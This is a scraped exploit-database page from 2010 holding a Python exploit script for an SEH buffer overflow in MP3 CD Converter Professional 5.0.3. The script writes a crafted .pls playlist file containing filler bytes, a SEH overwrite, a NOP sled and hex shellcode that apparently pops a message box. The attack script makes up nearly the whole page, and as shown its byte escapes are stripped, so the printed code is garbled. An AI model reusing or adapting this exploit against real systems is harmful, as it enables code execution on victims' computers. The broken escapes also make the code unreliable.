[local exploits] - MP3 CD Converter Professional BoF (SEH)
Posted on 20 December 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>MP3 CD Converter Professional BoF (SEH) | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='MP3 CD Converter Professional BoF (SEH) by C4SS!0 G0M3S in local exploits | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>======================================= MP3 CD Converter Professional BoF (SEH) ======================================= #!/usr/bin/python # # #Python File Created BY C4SS!0 G0MES #http://www.invasao.com.br #Louredo_@hotmail.com # # #[+]Exploit Titule: Exploit Buffer Overflow MP3 CD Converter Professional(SEH) #[+]Date: 12/20/2010 #[+]Author: C4SS!0 G0M3S #[+]Software Link: http://www.mp3-cd-converter.com/mp3cdconverter.exe #[+]Version: 5.0.3 #[+]Tested On: WIN-XP SP3 Virtual Box #[+]CVE: N/A # # # import os import sys import struct import time def usage(): os.system("cls") os.system("color 4f") print(" " "===================================================================== " "|| || " "|| Exploit Buffer Overflow MP3 CD Converter Professional(SEH) || " "|| Author C4SS!0 G0M3S || ||" " || " "===================================================================== ") print("[+]Exploit: Exploit Buffer Overflow MP3 CD Converter Professional(SEH)") print("[+]Date: 12/20/2010") print("[+]Author: C4SS!0 G0M3S") print("[+]E-mail: Louredo_@hotmail.com") print("[+]Home: http://www.invasao.com.br") print("[+]Impact: Hich") print("[+]Version: 5.0.3") print("[+]Country: Brazil ") if len(sys.argv) !=2: usage() print "[-]Usage: "+sys.argv[0]+" <File Name>" print "[-]Exemple: "+sys.argv[0]+" Exploit.pls" sys.exit(0) buffer = "x41" * 780 nseh = "xebx0dx90x90" #JMP SHORT 14 seh = struct.pack('<L',0x0077cebf) nops = "x90" * 10 usage() print "[*]Identifying the length Shellcode" time.sleep(1) shellcode = ("x33xC0x33xC9x33xD2x33xDBx50x68x6Cx6Cx20x20x68x33x32x2Ex64x68x75x73x65x72x54x58xBBx7Bx1Dx80x7Cx50" "xFFxD3x90x33xD2x52xB9x5Ex67x30xEFx81xC1x11x11x11x11x51x68x61x67x65x42x68x4Dx65x73x73x54x5Ax52x50" "xB9x30xAEx80x7CxFFxD1x33xC9x33xD2x33xDBx51x68x53x20x20x20x68x47x30x4Dx33x68x53x21x30x20x68x20x43" "x34x53x68x64x20x42x79x68x6Fx69x74x65x68x45x78x70x6Cx54x59x53x68x21x30x20x20x68x43x34x53x53x54x5B" "x6Ax40x53x51x52xFFxD0x33xC0x50xBExFAxCAx81x7CxFFxD6") print "[*]The length is Shellcode:"+str(len(shellcode)) time.sleep(1) payload = str(buffer+nseh+seh+nops+shellcode) print "[*]Creating the Archive "+sys.argv[1] time.sleep(1) file = sys.argv[1] try: f=open(file,"w") f.write(payload) f.close() print "[*]The Archive was created "+str(file)+" Success" time.sleep(1) except: print "[-]Error Creating File "+file # <a href='http://1337db.com/'>1337db.com</a> [2010-12-20]</pre></body></html>
